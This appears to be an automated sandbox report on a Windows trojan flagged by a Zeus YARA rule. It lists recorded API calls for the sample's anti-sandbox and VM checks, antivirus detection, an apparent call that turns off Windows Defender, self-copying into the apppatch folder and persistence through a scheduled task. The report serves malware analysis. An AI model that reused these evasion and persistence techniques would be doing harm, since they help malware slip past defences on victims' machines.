                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true


                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:1.1%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:65.2%
                                                                                                                                                                                                                    Total number of Nodes:244
                                                                                                                                                                                                                    Total number of Limit Nodes:11

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                      • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                                    • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                    • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$Pn7w$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                    • API String ID: 3353599405-700788231
                                                                                                                                                                                                                    • Opcode ID: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
                                                                                                                                                                                                                    • Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 129 403900-403948 RegOpenKeyExA 130 40394a-40396d RegQueryValueExA 129->130 131 4039ad-4039e5 GetUserNameA CharUpperA strstr 129->131 134 40397b-40398c RegCloseKey 130->134 135 40396f-403979 RegCloseKey 130->135 132 403acb 131->132 133 4039eb-4039fe strstr 131->133 137 403acc-403ad2 132->137 133->132 136 403a04-403a17 strstr 133->136 134->131 138 40398e-403995 134->138 135->131 136->132 139 403a1d-403a5b GetSystemWindowsDirectoryA GetVolumeInformationA 136->139 138->131 140 403997-40399e 138->140 139->132 141 403a5d-403a62 139->141 140->131 142 4039a0-4039a7 140->142 141->132 143 403a64-403a69 141->143 142->131 142->137 143->132 144 403a6b-403a70 143->144 144->132 145 403a72-403a77 144->145 145->132 146 403a79-403aa3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403aa5-403ab5 StrStrIA 146->147 147->132 148 403ab7-403ac7 StrStrIA 147->148 148->132 149 403ac9 148->149 149->132
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                    • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                                    • API String ID: 1431998568-3499098167
                                                                                                                                                                                                                    • Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                                    • Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 150 4020b0-4021fe CreateFileA 151 402230-402235 150->151 152 402200-40222a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                    • API String ID: 33631002-3172865025
                                                                                                                                                                                                                    • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 153 401a30-401a45 154 401b53-401b59 153->154 155 401a4b-401a58 call 4010a0 153->155 155->154 158 401a5e-401a69 RtlImageNtHeader 155->158 159 401b31-401b45 GetProcessHeap HeapValidate 158->159 160 401a6f-401a90 GetTickCount GetModuleHandleA 158->160 159->154 161 401b47-401b4d GetProcessHeap RtlFreeHeap 159->161 162 401a92-401aa0 GetProcAddress 160->162 163 401aa9-401ac4 160->163 161->154 162->163 165 401aa2 162->165 163->159 164 401ac6-401ae7 CreateFileA 163->164 164->159 166 401ae9-401b01 WriteFile 164->166 165->163 167 401b03-401b04 SetEndOfFile 166->167 168 401b0a-401b13 166->168 167->168 168->159 169 401b15-401b22 GetHandleInformation 168->169 169->159 170 401b24-401b28 169->170 170->159 171 401b2a-401b2b CloseHandle 170->171 171->159
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004010A0: CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                                      • Part of subcall function 004010A0: RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                                      • Part of subcall function 004010A0: memset.MSVCRT ref: 00401114
                                                                                                                                                                                                                      • Part of subcall function 004010A0: ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                                      • Part of subcall function 004010A0: HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                                      • Part of subcall function 004010A0: HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                                      • Part of subcall function 004010A0: CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                                      • Part of subcall function 004010A0: IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 00401A5F
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A77
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401A88
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401A98
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401ADC
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AF9
                                                                                                                                                                                                                    • SetEndOfFile.KERNELBASE(00000000), ref: 00401B04
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B1A
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00401B2B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B3A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00401B3D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B4A
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 00401B4D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$File$HandleProcess$CloseCreateFreeInformationValidateWrite$AddressAllocateCountHeaderImageModuleProcReadSizeTickmemset
                                                                                                                                                                                                                    • String ID: '+@$RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 444222748-2605303930
                                                                                                                                                                                                                    • Opcode ID: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
                                                                                                                                                                                                                    • Instruction ID: 5333274c7b5ae32bd68dbaed39568bfcb3f6f97b50696231050ce748e7cb221e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 083181B1601304ABE710AB75DD49F5B3AACAB84755F458136FF05F72E0EB78D9008AA8

                                                                                                                                                                                                                    Control-flow Graph: function 004010A0 (nodes marked Executed / Not Executed)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401114
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                                    • String ID: '+@
                                                                                                                                                                                                                    • API String ID: 995291462-3270456718
                                                                                                                                                                                                                    • Opcode ID: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
                                                                                                                                                                                                                    • Instruction ID: 9704cbedb43cf1f0123ea2a6f6cc4f04c30b9336f8140f0f9319c9250b15b478
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF3176B2A01214ABD7109BA59D48F6B7B6CEB88B51F144236FF04F7290D7349D0186A8

                                                                                                                                                                                                                    Control-flow Graph: function 00401FC0 (nodes marked Executed / Not Executed)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402037
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402046
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                    • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                                    • API String ID: 1010965793-4204822615
                                                                                                                                                                                                                    • Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                                    • Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8

                                                                                                                                                                                                                    Control-flow Graph: function 00402560 (nodes marked Executed / Not Executed)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                                    • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                    • String ID: Windows Explorer
                                                                                                                                                                                                                    • API String ID: 1140695583-228612681

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                    • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                    • API String ID: 3225117150-898603304

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(00401C30,?,0000001C,00000000,00000000,76D6DB30), ref: 0040298B
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004029A3
                                                                                                                                                                                                                    • PathFileExistsA.KERNELBASE(?), ref: 004029C4
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 004029DC
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402A1D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402A2D
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00402A3E
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402A76
                                                                                                                                                                                                                      • Part of subcall function 004012A0: GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                                      • Part of subcall function 004012A0: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                                      • Part of subcall function 004012A0: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                                      • Part of subcall function 00401330: GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                                      • Part of subcall function 00401330: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                                      • Part of subcall function 00401330: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00402AF0
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00402B08
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 00402B3A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B65
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00402B68
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B74
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 00402B77
                                                                                                                                                                                                                    • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402B96
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402BA5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402BB5
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00402BC6
                                                                                                                                                                                                                    • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402BE4
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402BF5
                                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402C00
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                    • String ID: %s_$.dat$Fri Jun 17 05:52:09 20111$IsWow64Process$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                    • API String ID: 4049655197-4201755136

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
